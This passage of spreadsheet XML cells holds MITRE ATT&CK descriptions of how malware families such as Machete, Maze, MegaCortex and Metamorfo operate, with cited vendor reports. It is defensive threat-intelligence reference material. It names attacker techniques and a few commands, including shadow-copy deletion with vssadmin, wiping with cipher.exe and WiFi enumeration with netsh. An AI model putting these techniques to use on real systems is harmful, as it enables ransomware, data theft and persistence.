    <t>[MacSpy](https://attack.mitre.org/software/S0282) can capture screenshots of the desktop over multiple monitors.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[MacSpy](https://attack.mitre.org/software/S0282) uses HTTP for command and control.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) saves the window names.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) stores zipped files with profile data from installed web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)'s collected data is encrypted with AES before exfiltration.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used TLS-encrypted FTP to exfiltrate data.(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures audio from the computer’s microphone.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409)’s collected files are exfiltrated automatically to remote servers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) retrieves the user profile data (e.g., browsers) from Chrome and Firefox browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) hijacks the clipboard data by creating an overlapped window that listens to keyboard events.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects stored credentials from several web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) searches the File system for files of interest.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) can find, encrypt, and upload files from fixed and removable drives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)’s downloaded data is decrypted using AES.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409)'s collected data is exfiltrated over the same channel used for C2.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has a feature to copy files from every drive onto a removable drive in a hidden folder.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has sent data over HTTP if FTP failed, and has also used a fallback server.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">Once a file is uploaded, [Machete](https://attack.mitre.org/software/S0409) will delete it from the machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses FTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) produces file listings in order to search for files to be exfiltrated.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has the capability to exfiltrate stolen data to a hidden folder on a removable drive.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Machete](https://attack.mitre.org/software/S0409) can download additional files for execution on the victim’s machine.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) logs keystrokes from the victim’s machine.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) stores files and logs in a folder on the local drive.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) renamed task names to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python tasks.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) renamed payloads to masquerade as legitimate Google Chrome, Java, Dropbox, Adobe Reader and Python executables.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used pyobfuscate, zlib compression, and base64 encoding for obfuscation. [Machete](https://attack.mitre.org/groups/G0095) has also used some visual obfuscation techniques by naming variables as combinations of letters to hinder analysis.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) detects the insertion of new devices by listening for the WM_DEVICECHANGE window message.(Citation: ESET Machete July 2019)  </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has scanned and looked for cryptographic keys and certificate file extensions.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has a component to check for running processes to look for web browsers.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is written in Python and is used in conjunction with additional Python scripts.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) used the startup folder for persistence.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)</t>
  </si>
  <si>
    <t>The different components of [Machete](https://attack.mitre.org/software/S0409) are executed by Windows Task Scheduler.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) sends stolen data to the C2 server every 10 minutes.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) captures screenshots.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) has been packed with NSIS.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used base64 encoding.(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) has used AES to exfiltrate documents.(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) collects the hostname of the target computer.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) collects the MAC address of the target computer and other network configuration information.(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Machete](https://attack.mitre.org/software/S0409) uses the &lt;code&gt;netsh wlan show networks mode=bssid&lt;/code&gt; and &lt;code&gt;netsh wlan show interfaces&lt;/code&gt; commands to list all nearby WiFi networks and connected interfaces.(Citation: ESET Machete July 2019) </t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) takes photos from the computer’s web camera.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) uses HTTP for Command &amp; Control.(Citation: ESET Machete July 2019)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used to obtain account names from Exchange and Office 365 using the &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; cmdlet.(Citation: Black Hills Attacking Exchange MailSniper, 2016)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for password spraying against Exchange and Office 365.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>[MailSniper](https://attack.mitre.org/software/S0413) can be used for searching through email in Exchange and Office 365 environments.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of providing Meterpreter shell access.(Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of stealing Outlook passwords.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses DNS for C2.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses reflective DLL injection to inject the malicious library and execute the RAT.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of keylogging.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) obfuscates API function names using a substitute cipher combined with Base64 encoding.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding Registry Run keys.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) can establish persistence by adding a Scheduled Task named "Microsoft Boost Kernel Optimization".(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Matryoshka](https://attack.mitre.org/software/S0167) is capable of performing screen captures.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [Maze](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020) It has also disabled Windows Defender's Real-Time Monitoring feature and attempted to disable endpoint protection services.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including "forum", "php", "view", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) operators have created scheduled tasks masquerading as "Windows Update Security", "Windows Update Security Patches", and "Google Chrome Security Update" designed to launch the ransomware.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using &lt;code&gt;msiexec&lt;/code&gt;.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has decrypted strings and other important information during the encryption process. [Maze](https://attack.mitre.org/software/S0449) also calls certain functions dynamically to hinder analysis.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has created a file named "startup_vrun.bat" in the Startup folder of a virtual machine to establish persistence.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so [Maze](https://attack.mitre.org/software/S0449) can encrypt files on the shared drives as well as the local machine.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has created scheduled tasks using name variants such as "Windows Update Security", "Windows Update Security Patches", and "Google Chrome Security Update", to launch [Maze](https://attack.mitre.org/software/S0449) at a specific time.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has stopped SQL services to ensure it can encrypt any database.(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the "GetUSerDefaultUILanguage" function.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has used the "WNetOpenEnumW", "WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has issued a shutdown command on a victim machine that, upon reboot, will run the ransomware within a VM.(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t>[Maze](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)</t>
  </si>
  <si>
    <t>The [Maze](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)(Citation: Sophos Maze VM September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Maze](https://attack.mitre.org/software/S0449) has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020) </t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to send the compromised user's account name and hostname within a URL to C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to upload and download files to and from a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) uses a python-based payload.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use base16 encoded strings in C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to identify the username and hostname on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to run commands on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can enable &lt;code&gt;SeDebugPrivilege&lt;/code&gt; and adjust token privileges.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has changed user account passwords and logged users off the system.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used code signing certificates issued to fake companies to bypass security controls.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.(Citation: IBM MegaCortex)(Citation: mbed-crypto)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used a Base64 key to decode its components.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) was used to kill endpoint security processes.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>Disk Content Wipe</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) can wipe deleted data from all drives using &lt;code&gt;cipher.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) loads &lt;code&gt;injecthelper.dll&lt;/code&gt; into a newly created &lt;code&gt;rundll32.exe&lt;/code&gt; process.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can parse the available drives and directories to determine which files to encrypt.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has deleted volume shadow copies using &lt;code&gt;vssadmin.exe&lt;/code&gt;.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has added entries to the Registry for ransom contact information.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>After escalating privileges, [MegaCortex](https://attack.mitre.org/software/S0576) calls &lt;code&gt;TerminateProcess()&lt;/code&gt;, &lt;code&gt;CreateRemoteThread&lt;/code&gt;, and other Win32 APIs.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t>[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;rundll32.exe&lt;/code&gt; to load a DLL for file encryption.(Citation: IBM MegaCortex)</t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) can stop and disable services on the system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t xml:space="preserve">[MegaCortex](https://attack.mitre.org/software/S0576) has used &lt;code&gt;.cmd&lt;/code&gt; scripts on the victim's system.(Citation: IBM MegaCortex) </t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor content saved to the clipboard.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been distributed through an AutoIt loader script.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to steal credentials from web browsers.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use DLL hijacking to bypass security controls.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has the ability to download additional files to a compromised host.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has gained execution through victims opening malicious links.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use MSI files with embedded VBScript for execution.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been packed with VMProtect and Themida.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) has been spread through malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Melcoz](https://attack.mitre.org/software/S0530) can use VBS scripts to execute malicious DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) can enumerate all windows on the victim’s machine.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455)'s C2 communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function to receive data from the system clipboard.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has digitally signed executables using AVAST Software certificates.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has side-loaded its malicious DLL file.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Upon execution, [Metamorfo](https://attack.mitre.org/software/S0455) has unzipped itself after being downloaded to the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function to kill processes associated with defenses and can prevent certain processes from launching.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has injected a malicious DLL into the Windows Media Player process (wmplayer.exe).(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has searched the Program Files directories for specific folders and has searched for strings related to its mutexes.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has displayed fake forms on top of banking sites to intercept credentials from victims.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has hidden its GUI using the ShowWindow() WINAPI call.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a command to delete a Registry key it uses, &lt;code&gt;\Software\Microsoft\Internet Explorer\notes&lt;/code&gt;.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used MSI to download files for execution.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) includes payloads written in JavaScript.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a command to launch a keylogger on the victim’s machine.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) requires the user to double-click the executable to run the malicious HTA file.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has disguised an MSI file as the Adobe Acrobat Reader Installer.(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used mshta.exe to execute a HTA payload.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used MsiExec.exe to automatically execute files.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has used native WINAPI calls.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used raw TCP for C2.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has communicated with hosts over raw TCP on port 9999.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has obfuscated and encrypted some payloads.(Citation: Medium Metamorfo Apr 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has downloaded a zip file for execution on the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has performed process name checks and has monitored applications.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has written its executable path to a Registry Run key and used .LNK files in the startup folder to achieve persistence.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) can collect screenshots of the victim’s machine.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) collects a list of installed antivirus software from the victim’s system.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) had used AutoIt to load and execute the DLL payload.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has searched the system for an extensive list of Brazilian banking software.(Citation: FireEye Metamorfo Apr 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has used VMProtect to pack and protect files.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has been delivered to victims via emails containing malicious HTML attachments.(Citation: FireEye Metamorfo Apr 2018) </t>
  </si>
  <si>
    <t>[Metamorfo](https://attack.mitre.org/software/S0455) has collected the hostname and Operating System version from the system.(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) uses JavaScript to get the system time.(Citation: Medium Metamorfo Apr 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Metamorfo](https://attack.mitre.org/software/S0455) has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.(Citation: Fortinet Metamorfo Feb 2020) </t>
  </si>
  <si>
